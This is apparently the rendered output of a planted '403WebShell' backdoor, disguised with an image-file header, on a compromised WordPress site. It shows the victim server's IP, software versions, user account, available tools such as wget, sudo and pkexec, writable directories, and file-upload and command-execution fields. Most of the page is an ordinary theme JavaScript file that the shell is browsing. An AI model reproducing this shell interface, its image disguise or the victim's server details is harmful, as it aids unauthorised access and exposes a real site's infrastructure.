????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.145.200.8
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/www.astacus.se/wp-content/themes/x/framework/js/dist/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/www.astacus.se/wp-content/themes/x/framework/js/dist/admin/x-customizer-preview.js
// =============================================================================
// JS/ADMIN/X-CUSTOMIZER-PREVIEW.JS
// -----------------------------------------------------------------------------
// Customizer control handling.
// =============================================================================

// =============================================================================
// TABLE OF CONTENTS
// -----------------------------------------------------------------------------
//   01. Customizer Control Handling
//   02. Unpersist WooCommerce Navbar Cart
// =============================================================================

// Customizer Control Handling
// =============================================================================

( function( $ ) {

  //
  // Layout.
  //

  wp.customize( 'x_layout_site_max_width', function( value ) {
    value.bind( function( newval ) {
      $( 'body .x-container.max' ).css( 'max-width', newval + 'px' );
      $( 'body.x-boxed-layout-active .site' ).css( 'max-width', newval + 'px' );
    } );
  } );

  wp.customize( 'x_layout_site_width', function( value ) {
    value.bind( function( newval ) {
      $( 'body .x-container.width' ).css( 'width', newval + '%' );
      $( 'body.x-boxed-layout-active .site' ).css( 'width', newval + '%' );
    } );
  } );

  wp.customize( 'x_layout_content_width', function( value ) {
    value.bind( function( newval ) {

      if ( $( 'body' ).hasClass( 'x-integrity' ) ) {

        $( 'body.x-content-sidebar-active:not([class*="template-blank"]) .x-main' ).css( 'width', newval - 2.463055 + '%' );
        $( 'body.x-sidebar-content-active:not([class*="template-blank"]) .x-main' ).css( 'width', newval - 2.463055 + '%' );
        $( 'body.x-content-sidebar-active:not([class*="template-blank"]) .x-sidebar' ).css( 'width', 100 - 2.463055 - newval + '%' );
        $( 'body.x-sidebar-content-active:not([class*="template-blank"]) .x-sidebar' ).css( 'width', 100 - 2.463055 - newval + '%' );

      } else if ( $( 'body' ).hasClass( 'x-renew' ) ) {

        $( 'body.x-content-sidebar-active:not([class*="template-blank"]) .x-main' ).css( 'width', newval - 3.20197 + '%' );
        $( 'body.x-sidebar-content-active:not([class*="template-blank"]) .x-main' ).css( 'width', newval - 3.20197 + '%' );
        $( 'body.x-content-sidebar-active:not([class*="template-blank"]) .x-sidebar' ).css( 'width', 100 - 3.20197 - newval + '%' );
        $( 'body.x-sidebar-content-active:not([class*="template-blank"]) .x-sidebar' ).css( 'width', 100 - 3.20197 - newval + '%' );

      } else if ( $( 'body' ).hasClass( 'x-ethos' ) ) {

        if ( $( 'body' ).children( 'style' ) ) {
          $( 'body' ).children( 'style' ).remove();
        }
        $( 'body' ).prepend('<style scoped>body.x-content-sidebar-active:not([class*="template-blank"]) .x-container.main:before { right: ' + ( 100 - newval ) + '%; } body.x-sidebar-content-active:not([class*="template-blank"]) .x-container.main:before { left: ' + ( 100 - newval ) + '%; }</style>');
        $( 'body.x-content-sidebar-active:not([class*="template-blank"]) .x-main' ).css( 'width', newval + '%' );
        $( 'body.x-sidebar-content-active:not([class*="template-blank"]) .x-main' ).css( 'width', newval + '%' );
        $( 'body.x-content-sidebar-active:not([class*="template-blank"]) .x-sidebar' ).css( 'width', 100 - newval + '%' );
        $( 'body.x-sidebar-content-active:not([class*="template-blank"]) .x-sidebar' ).css( 'width', 100 - newval + '%' );
        $( 'body.x-content-sidebar-active:not([class*="template-blank"]) .x-post-slider' ).css( 'padding-right', 100 - newval + '%' );
        $( 'body.x-sidebar-content-active:not([class*="template-blank"]) .x-post-slider' ).css( 'padding-left', 100 - newval + '%' );
        $( 'body .x-post-slider .x-post-slider-control-nav' ).css( 'width', 100 - newval + '%' );

      }

    } );
  } );


  //
  // Design.
  //

  wp.customize( 'x_design_bg_color', function( value ) {
    value.bind( function( newval ) {
      $( 'body' ).css( 'background-color', newval );
    } );
  } );


  //
  // Integrity.
  //

  wp.customize( 'x_integrity_blog_title', function( value ) {
    value.bind( function( newval ) {
      $( '.x-integrity.blog .h-landmark span' ).html( newval );
      $( '.x-integrity.blog .x-breadcrumbs .current' ).html( newval );
    } );
  } );

  wp.customize( 'x_integrity_blog_subtitle', function( value ) {
    value.bind( function( newval ) {
      $( '.x-integrity.blog .p-landmark-sub span' ).html( newval );
    } );
  } );

  wp.customize( 'x_integrity_portfolio_archive_sort_button_text', function( value ) {
    value.bind( function( newval ) {
      $( '.x-integrity.page-template-template-layout-portfolio-php .x-portfolio-filters span' ).html( newval );
    } );
  } );

  wp.customize( 'x_integrity_shop_title', function( value ) {
    value.bind( function( newval ) {
      $( '.x-integrity.post-type-archive-product .h-landmark span' ).html( newval );
      $( '.x-integrity.post-type-archive-product .x-breadcrumbs .current' ).html( newval );
    } );
  } );

  wp.customize( 'x_integrity_shop_subtitle', function( value ) {
    value.bind( function( newval ) {
      $( '.x-integrity.post-type-archive-product .p-landmark-sub span' ).html( newval );
    } );
  } );


  //
  // Renew.
  //

  wp.customize( 'x_renew_blog_title', function( value ) {
    value.bind( function( newval ) {
      $( '.x-renew.blog .h-landmark span' ).html( newval );
      $( '.x-renew.blog .x-breadcrumbs .current' ).html( newval );
    } );
  } );

  wp.customize( 'x_renew_shop_title', function( value ) {
    value.bind( function( newval ) {
      $( '.x-renew.post-type-archive-product .h-landmark span' ).html( newval );
      $( '.x-renew.post-type-archive-product .x-breadcrumbs .current' ).html( newval );
    } );
  } );


  //
  // Icon.
  //

  wp.customize( 'x_icon_shop_title', function( value ) {
    value.bind( function( newval ) {
      $( '.x-icon.post-type-archive-product .entry-title' ).html( newval );
      $( '.x-icon.post-type-archive-product .x-breadcrumbs .current' ).html( newval );
    } );
  } );


  //
  // Letter spacing.
  //

  wp.customize( 'x_logo_letter_spacing', function( value ) {
    value.bind( function( newval ) {
      $( '.x-brand' ).css( 'letter-spacing', newval + 'em' );
    } );
  } );

  wp.customize( 'x_navbar_letter_spacing', function( value ) {
    value.bind( function( newval ) {
      $( '.x-navbar .x-nav-wrap .x-nav > li > a' ).css( 'letter-spacing', newval + 'em' );
    } );
  } );

  wp.customize( 'x_h1_letter_spacing', function( value ) {
    value.bind( function( newval ) {
      $( 'h1:not(.h2):not(.h3):not(.h4):not(.h5):not(.h6), .h1' ).css( 'letter-spacing', newval + 'em' );
    } );
  } );

  wp.customize( 'x_h2_letter_spacing', function( value ) {
    value.bind( function( newval ) {
      $( 'h2:not(.h1):not(.h3):not(.h4):not(.h5):not(.h6), .h2, body .gform_wrapper h2.gsection_title' ).css( 'letter-spacing', newval + 'em' );
    } );
  } );

  wp.customize( 'x_h3_letter_spacing', function( value ) {
    value.bind( function( newval ) {
      $( 'h3:not(.h1):not(.h2):not(.h4):not(.h5):not(.h6), .h3, body .gform_wrapper h3.gform_title' ).css( 'letter-spacing', newval + 'em' );
    } );
  } );

  wp.customize( 'x_h4_letter_spacing', function( value ) {
    value.bind( function( newval ) {
      $( 'h4:not(.h1):not(.h2):not(.h3):not(.h5):not(.h6), .h4' ).css( 'letter-spacing', newval + 'em' );
    } );
  } );

  wp.customize( 'x_h5_letter_spacing', function( value ) {
    value.bind( function( newval ) {
      $( 'h5:not(.h1):not(.h2):not(.h3):not(.h4):not(.h6), .h5' ).css( 'letter-spacing', newval + 'em' );
    } );
  } );

  wp.customize( 'x_h6_letter_spacing', function( value ) {
    value.bind( function( newval ) {
      $( 'h6:not(.h1):not(.h2):not(.h3):not(.h4):not(.h5), .h6' ).css( 'letter-spacing', newval + 'em' );
    } );
  } );

} )( jQuery );



// Unpersist WooCommerce Navbar Cart
// =============================================================================

( function( $ ) {

  if ( x_customizer_preview_data.x_woocommerce_is_active && 'sessionStorage' in window && window.sessionStorage !== null ) {

    var fragments = jQuery.parseJSON(window.sessionStorage.wc_fragments);
    delete fragments['div.x-cart'];
    window.sessionStorage.wc_fragments = JSON.stringify(fragments);

  }

} )( jQuery );

Youez - 2016 - github.com/yon3zu
LinuXploit